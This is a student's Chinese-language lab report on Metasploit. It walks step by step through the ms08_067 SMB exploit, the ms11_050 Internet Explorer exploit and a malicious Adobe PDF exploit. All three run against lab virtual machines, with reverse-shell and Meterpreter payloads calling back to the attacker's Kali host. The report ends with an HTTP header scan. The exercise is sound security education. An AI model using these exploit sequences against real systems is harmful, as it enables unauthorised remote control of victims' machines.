目录
2018-2019 20165208 网络对抗 Exp5 MSF基础
实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
1.5 报告评分(1分)
基础问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit:指由攻击者利用安全漏洞,将负责攻击的代码payload传送到靶机中。
- payload:是target在被渗透攻击之后去执行的恶意代码,如ex1的shellcode。
- encode:进行编码改变payload形态,使其不出现特定字符。
实践过程记录
1.一个主动攻击实践,如ms08_067;
①攻击机:kali IP:192.168.119.128
②靶机:windows XP SP3(English) IP:192.168.119.129(失败)
②靶机:windows 2000 Professional(English) IP:192.168.119.130(成功)
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
-
msf > use exploit/windows/smb/ms08_067_netapi
//使用ms08_067漏洞,use后其实是漏洞所在目录路径名 -
msf exploit(ms08_067_netapi) > show payloads
//显示回连攻击载荷 msf exploit(ms08_067_netapi) > set payload
-
generic/shell_reverse_tcp
//tcp反向回连 -
msf exploit(ms08_067_netapi) > set LHOST 192.168.119.128
//攻击机ip -
msf exploit(ms08_067_netapi) > set LPORT 5208
//攻击端口 -
msf exploit(ms08_067_netapi) > set RHOST 192.168.119.129
//靶机ip,特定漏洞端口已经固定 -
msf exploit(ms08_067_netapi) > set target 0
//自动选择目标系统类型,匹配度较高 -
msf exploit(ms08_067_netapi) > exploit
//攻击
-
建立会话,攻击失败显示如下:
- 通过网上查找资料,发现可能是打过补丁的原因,更换虚拟机。
- 选择靶机windows 2000 Professional(English)。
按上述命令进行操作,记得更换IP。
显示监听成功,
dir
命令成功。
2. 一个针对浏览器的攻击,如ms11_050;
①攻击机:kali IP:192.168.119.128
②靶机:windows 7 x64 IP:192.168.119.131 IE:8.0(失败)
②靶机:windows Sever 2008 IP:192.168.119.132(成功)
-
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
-
msf > use windows/browser/ms11_050_mshtml_cobjectelement
//使用浏览器ms11_050漏洞 -
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http
//http反向回连 -
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.119.128
//攻击机ip -
msf exploit(ms11_050_cobjectelement) > set LPORT 5208
//攻击端口固定 -
msf exploit(ms11_050_cobjectelement) > set URIPATH 5208ky
//统一资源标识符路径设置 msf exploit(ms11_050_cobjectelement) > exploit
-
运行靶机浏览器,这时win7出现DNS服务器未响应,尝试解决无果后,更换了虚拟机。
操作同上
在访问
http://192.168.119.128:8080/5208ky
时,可见攻击机出现访问信息。
3. 一个针对客户端的攻击,如Adobe;
①攻击机:kali IP:192.168.119.128
②靶机:windows XP sp2 IP:192.168.119.133
Adobe:9.3
-
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
- `msf > use windows/fileformat/adobe_cooltype_sing
- msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连
-
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.119.128
//攻击机ip -
msf exploit(adobe_cooltype_sing) > set LPORT 5208
//攻击端口 -
msf exploit(adobe_cooltype_sing) > set FILENAME 20165208.pdf
//设置生成pdf文件的名字 -
msf exploit(adobe_cooltype_sing) > exploit
//攻击
成功生成20165208.pdf。
-
将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:
-
msf > use exploit/multi/handler
//进入监听模块 -
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向连接 -
msf exploit(handler) > set LHOST 192.168.119.128
//攻击机ip -
msf exploit(handler) > set LPORT 5208
//攻击端口固定 msf exploit(handler) > exploit
-
然后在靶机上打开20165208.pdf文件。
kali连接成功。
攻击机运行ipconfig命令,可显示靶机IP地址。
靶机关闭pdf文件,则失去权限。
4. 成功应用任何一个辅助模块(scanner/http/http_header 唯一)
使用命令msf > show auxiliary查看所有的辅助模块
- 在看的时候我试了几个,因为好多命令的描述我不能准确的定位到它功能,最后我选择了
scanner/http/http_header
info scanner/http/http_header
查看命令相关信息。- 我们可以看到它的描述: This module shows HTTP Headers returned by the scanned systems。我最初以为它是给我返回浏览器的头部信息,也就是可以监听对方访问网页浏览的是什么。
实际操作:首先
use scanner/http/http_header
调用模块,然后根据info得出的参数信息对参数进行设定
use scanner/http/http_header
set RHOSTS 192.168.119.132
RHOSTS => 192.168.119.132
set HTTP_METHOD GET
set RPORT 8080
exploit
set RPORT 80
exploit
- 在端口80监听时我们可以看到返回信息
Microsoft-IIS/7.0
- 可以得出结论:目标计算机80端口上运行着IIS 7.0,
而在历年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影响的漏洞数居前四位。同时我们可以大概根据IIS 7.0 判断出它的操作系统版本为Win 200或Vista全系列 。这和我们的靶机系统也是匹配的。
IIS版本 | 系统版本 | 受影响漏洞数量 |
---|---|---|
IIS 5.0 | Windows 2000 | 10 |
IIS 5.1 | Windows XP 系列 | 16 |
IIS 7.0 | Win 2008、Vista全系列 | 11 |
IIS 10.0 | Win 10和Win 2016 | 2 |
实验中遇到的问题及解决方法
1.问题:在主动攻击实践时,操作完exploit
后显示 Exploit completed, but no session was created.
查了资料后我做了以下几个修改尝试:
我最初设的target参数是0,即自动选择目标系统类型。在尝试解决时我选了设为6。想说会不会这样的匹配度更合适,失败了。
后来找到过程中看到有说可能是系统打了补丁,使攻击难以进行。所以就选择更换了虚拟机。
2.问题:在进行针对浏览器的攻击时,靶机显示无法显示该网页
。进行诊断后提示是DNS服务器未响应。
根据网络诊断提示DNS服务器未响应,我进行了三种尝试,分别如下:
不过,so sad,失败了,最后选择更换为win 2008虚拟机。
实验感想
本次实验对MSF做了简单的试操作,在找到合适的虚拟机后实验还是相对清晰、简单的。在这个过程中,学会查找很主要,info
、show targets
、show payloads
等命令都帮了我不少忙。在整个实验中第四个模块是我独立完成的,网络上有关我选的这个命令的直接使用教程还是蛮少的,但是可以发现很多其他的例子。举一反三,怀着未知的忐忑去尝试成功后还是蛮有成就感的。